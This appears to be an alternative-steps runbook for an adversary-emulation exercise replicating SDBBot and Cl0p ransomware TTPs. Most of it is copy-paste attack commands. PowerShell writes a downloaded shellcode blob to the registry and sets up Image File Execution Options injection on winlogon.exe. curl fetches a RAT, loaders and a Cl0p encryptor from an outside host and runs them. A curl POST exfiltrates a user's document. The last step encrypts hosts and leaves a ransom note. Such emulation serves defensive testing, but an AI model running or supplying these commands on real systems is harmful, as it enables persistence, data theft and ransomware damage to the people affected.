This is the ALTERNATIVE instruction set for the Scenario
Legend of symbols:
- 💡 - callout notes
- ❗ - extremely important note
- ➡️ - Switching to another session
- ⭕ - Sign out of something
- :biohazard: - Procedure for a given step
This document provides alternative steps to perform if a particular portion of a step fails to execute. Due to the nature of the scenario and its components, not every part has a corresponding alternative step, and most alternative steps will sacrifice certain parts of the scenario, in particular the emulated TTPs.
Step 1 - Persistence
SDBBot Installer Failed to Write Shellcode Blob to Registry
:biohazard: Tier 1 Procedures
If the SDBBot installer failed to save the shellcode blob to the registry key
, search for PowerShell and right-click to Run As Administrator. Then run the following commands:$blob = (curl http://curse-breaker.org/files/shellcode-blob.bin).Content; if (!$blob) { Write-Host "[ERROR] Failed to fetch blob for IFEO registry write." } else { New-Item -Path "HKLM:\SOFTWARE\Microsoft\skw" -Force; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\skw" -Name "d" -Type Binary -Value ([byte[]]$blob); }
SDBBot Installer Failed to Write Symlink in SYSTEM32
:biohazard: Tier 1 Procedures
If the SDBBot installer failed to create the symlink file
for the loader DLL, search for PowerShell and right-click to Run As Administrator, or use an existing Adminstrator PowerShell window if available. Then run the following commands:cmd /c "mklink C:\Windows\System32\msverload.dll C:\Windows\Temp\tmp8AB2.tmp"
SDBBot Installer Failed to Set Up Image File Execution Options Injection
:biohazard: Tier 1 Procedures
If the SDBBot installer failed to perform the registry writes to set up Image File Execution Options Injection for
, search for PowerShell and right-click to Run As Administrator, or use an existing Adminstrator PowerShell window if available. Then run the following commands:New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe" -Force; New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe\0" -Force; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe" -Name "UseFilter" -Value 0x1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe\0" -Name "VerifierDlls" -Value "msverload.dll"; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe\0" -Name "GlobalFlag" -Value 0x100; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe\0" -Name "VerifierFlags" -Value 0x80000000; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe\0" -Name "FilterFullPath" -Value "C:\Windows\System32\winlogon.exe";
SDBBot Installer Failed to Drop Loader DLL to Disk
:biohazard: Tier 1 Procedures
If the SDBBot installer failed to drop the loader DLL to disk at
, search for PowerShell and right-click to Run As Administrator, or use an existing Adminstrator PowerShell window if available. Then run the following commands:curl http://curse-breaker.org/files/msverload.dll -OutFile C:\Windows\Temp\tmp8AB2.tmp
SDBBot Loader DLL Failed to Execute
:biohazard: Tier 1 Procedures
If the SDBBot loader DLL failed to launch or if the image file execution options injection failed in any other way, search for PowerShell and right-click to Run As Administrator, or use an existing Adminstrator PowerShell window if available. Then run the following commands:
curl http://curse-breaker.org/files/msverload_alt.dll -OutFile C:\Windows\Temp\msverload_alt.dll rundll32.exe C:\Windows\Temp\msverload_alt.dll,entry_point
➡️ Return to the Kali attack host corsair (
Confirm C2 registration of the SDBbot RAT
Step 2 - Command and Control
Failed to Establish SDBBOT Rat Session
:biohazard: Tier 1 Procedures
➡️ Initiate an RDP session to
diagonalley (
(if not already open)Search for Command Prompt and right-click to Run As Administrator then copy and paste all the commands below. Hit enter to run the commands.
curl --output "C:\\Windows\\Temp\\rat.dll" http://curse-breaker.org/files/rat.dll curl --output "C:\\Windows\\Temp\\rtr.exe" http://curse-breaker.org/files/rat-runner.exe C:\Windows\Temp\rtr.exe
No SDBBot to execute commands or failed to execute commands via SDBBOT
:biohazard: Tier 1 Procedures
➡️ Initiate an RDP session to
diagonalley (
(if not already open)Search for Command Prompt and right-click to Run As Administrator then copy and paste all the commands below. Hit enter to run the commands.
whoami /all whoami /fqdn hostname systeminfo reg query "HKCU\Control Panel\International\Geo"
Step 3 - Discovery and Exfiltration
No SDBBot to execute commands
:biohazard: Tier 1 Procedures
In the elevated Command Prompt, execute the following command to enumerate a user directory:
dir C:\users
Execute the following command to exfiltrate the file:
curl -X POST http://curse-breaker.org/uploads -H "filename:Findings_reZGaJ.doc" --data-binary "@C:\Users\griphook\Desktop\Findings_reZGaJ.doc"
Step 4 - Defense Evasion and Impact
Failed to download Cl0p or no SDBBot to download/execute cl0p
:biohazard: Tier 1 Procedures
➡️ Initiate an RDP session to
diagonalley (
(if not already open)Search for Command Prompt and right-click to Run As Administrator then copy and paste all the commands below. Hit enter to run the commands.
curl --output C:\Windows\System32\SysMonitor.exe http://curse-breaker.org/files/main.exe C:\Windows\System32\SysMonitor.exe
Cl0p Fails to Execute
:biohazard: Tier 1 Procedures
Open an elevated command prompt and run the following command to download the alternative Cl0p batch script to
diagonalley (
:curl --output C:\Windows\System32\SysMonitor.bat http://curse-breaker.org/files/cl0p.bat
Enter the following command to download the minimal Cl0p encryption executable to
diagonalley (
:curl --output C:\Windows\System32\SysMonitor.minimal.exe http://curse-breaker.org/files/minimal.exe
Enter the following command to execute the alternative batch script:
C:\Windows\System32\SysMonitor.bat C:\Windows\System32\SysMonitor.minimal.exe
Verify that the hosts were encrypted by checking the presence of files with the
extension and theReadme!_CI0P!.txt
ransom note in directories.Verify activity failure or success by looking at terminal output and at the
log file on affected hosts.